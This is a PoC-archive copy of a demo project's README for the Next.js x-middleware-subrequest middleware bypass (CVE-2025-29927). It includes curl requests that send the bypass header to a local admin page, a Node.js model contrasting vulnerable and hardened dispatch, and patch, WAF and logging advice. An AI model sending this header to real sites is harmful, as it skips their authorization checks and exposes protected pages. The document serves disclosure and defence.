Related vulnerability
Introduction
# Next.js Authorization Bypass Demo
This application demonstrates the `x-middleware-subrequest` header bypass in Next.js 13.4.19 (publicly tracked as CVE-2025-29927). The affected router treated a client-supplied `x-middleware-subrequest` header as the marker of an internal sub-request and skipped middleware when the header named the middleware being run, so any authorization check implemented only in `middleware.ts` could be bypassed with one extra request header and no credentials.
## Setup
1. Install dependencies:
```bash
npm install
```
2. Start the development server:
```bash
npm run dev
```
## Vulnerability Demonstration
The application has an admin page at `/admin` that is protected only by the middleware in `middleware.ts`. That protection can be skipped without authenticating by sending an `x-middleware-subrequest` header whose value names the middleware. For a `middleware.ts` at the project root, as in this demo, that name is `middleware`.
### Normal Flow
1. Visit `/admin` without a session: the middleware redirects you to `/login`.
2. Log in with any credentials (the demo login does not validate them): you are redirected to `/admin` and see the page.
### Bypass Method
To bypass the authentication, use curl or any HTTP client to request `/admin` with the `x-middleware-subrequest` header set to the middleware's name. No cookie or session is needed; `-i` is added so the status line is visible, and the request without the header is included for comparison:
```bash
# Without the header: the middleware answers with a redirect to /login.
curl -i http://localhost:3000/admin

# With the header: the middleware is skipped and /admin is served with 200.
curl -i -H "x-middleware-subrequest: middleware" http://localhost:3000/admin
```
If the middleware lived in `src/middleware.ts` instead, the value would be `src/middleware`; the value is matched against the middleware's registered name, not a fixed string.
## Security Implications
This demo shows that in Next.js 13.4.19 middleware protection is bypassable by anyone who can add a request header, which means any unauthenticated client. In production this affects every route whose authorization, redirect or header-injection logic lives only in middleware: login walls, role checks and geo or bot blocking are all skipped, while routes that re-check the session in the page or API handler itself are unaffected. The header is also a useful detection signal: legitimate browsers never send `x-middleware-subrequest`, so its presence in edge or proxy logs on inbound requests is worth alerting on.
## Fix
Upgrade to a Next.js release where the issue is patched: 13.5.9 for the 13.x line, or 12.3.5, 14.2.25 and 15.2.3 for the other supported lines. If you cannot upgrade immediately, strip or block `x-middleware-subrequest` on inbound requests at the reverse proxy, load balancer or WAF in front of the application, since the header is only meant for Next.js's own internal sub-requests and never has a legitimate external sender. Independently of the patch, do not let middleware be the only authorization layer; re-check the session in the protected page or route handler as well.
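The following added example is not the demo project's code or Next.js's own source. It models, in plain Node.js, the dispatch decision described in the Bypass Method section (skip the middleware when the client-supplied header names it) next to the hardened dispatch that applies the Fix section's mitigation of dropping the header before it is evaluated. The middleware name, the cookie-based session check standing in for the demo's `middleware.ts` (whose content is not shown on this page), and the three sample requests are all assumptions made for this illustration:

```javascript
'use strict';

// Header that Next.js used internally to mark sub-requests made from middleware.
const SUBREQUEST_HEADER = 'x-middleware-subrequest';

// Next.js registers the middleware under its file name: `middleware.ts` at the
// project root is "middleware" (a `src/middleware.ts` would be "src/middleware").
// Assumed here to match the demo's layout.
const MIDDLEWARE_NAME = 'middleware';

// Stand-in for the demo's middleware.ts (assumed logic): redirect to /login
// unless a session cookie is present. Header names are lowercase, as Node
// presents them.
function authMiddleware(req) {
  const cookies = req.headers['cookie'] || '';
  if (!/(?:^|;\s*)session=\w+/.test(cookies)) {
    return { status: 307, location: '/login' };
  }
  return null; // null: let the request continue to the route handler
}

// The protected route; only reachable if the middleware did not redirect.
function adminPage() {
  return { status: 200, body: 'admin' };
}

// Vulnerable dispatch: the router trusted the client-supplied header as proof
// of an internal sub-request and skipped the middleware whenever the
// colon-separated list in the header contained the middleware's name.
function dispatchVulnerable(req) {
  const raw = req.headers[SUBREQUEST_HEADER];
  const subrequests = typeof raw === 'string' ? raw.split(':') : [];
  if (!subrequests.includes(MIDDLEWARE_NAME)) {
    const early = authMiddleware(req);
    if (early) return early;
  }
  return adminPage();
}

// Hardened dispatch: the header is removed before the router ever sees it,
// which is the effect of stripping it at a reverse proxy or WAF. The
// vulnerable router logic is left untouched to show that the edge rule alone
// closes the bypass.
function dispatchHardened(req) {
  const headers = { ...req.headers };
  delete headers[SUBREQUEST_HEADER];
  return dispatchVulnerable({ ...req, headers });
}

// Constructed requests mirroring the README's cases: anonymous, logged in,
// and anonymous with the bypass header (the curl command in the README).
const anonymous = { path: '/admin', headers: {} };
const loggedIn  = { path: '/admin', headers: { cookie: 'session=abc123' } };
const bypass    = { path: '/admin', headers: { [SUBREQUEST_HEADER]: 'middleware' } };

// Runs every request through both dispatchers and returns the status codes.
function demo() {
  const run = (dispatch) => ({
    anonymous: dispatch(anonymous).status,
    loggedIn: dispatch(loggedIn).status,
    bypass: dispatch(bypass).status,
  });
  return { vulnerable: run(dispatchVulnerable), hardened: run(dispatchHardened) };
}

console.table(demo());
```

Running the block prints a table in which the vulnerable dispatcher serves `/admin` with 200 for the anonymous request carrying the header, exactly like the curl bypass, while the hardened dispatcher answers it with the same 307 redirect an anonymous request gets. Note that the vulnerable check splits on `:` and tests membership, so a value such as `foo:middleware` also triggers the skip; a WAF rule should therefore drop the header outright rather than match one exact value.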
File snapshot
[4.0K] /data/pocs/9e462efb2182d79fcd2651ea7b989733d6942196
├── [4.0K] app
│ ├── [4.0K] admin
│ │ └── [ 911] page.tsx
│ ├── [ 59] globals.css
│ ├── [ 488] layout.tsx
│ └── [4.0K] login
│ └── [2.0K] page.tsx
├── [1.1K] middleware.ts
├── [656K] morpheus.gif
├── [ 534] package.json
├── [ 71K] package-lock.json
├── [ 82] postcss.config.js
├── [1.2K] README.md
├── [ 253] tailwind.config.js
└── [ 581] tsconfig.json
3 directories, 12 files
Notes
1. Accessing the POC through its original source is recommended.
2. If the source is gone or unreachable, send an email to f.jinxu#gmail.com to request the local snapshot (replace # with @).
3. 神龙 (Shenlong) has taken a snapshot of the POC code for you; to support long-term maintenance, please consider paying for the local POC. Thank you for your support.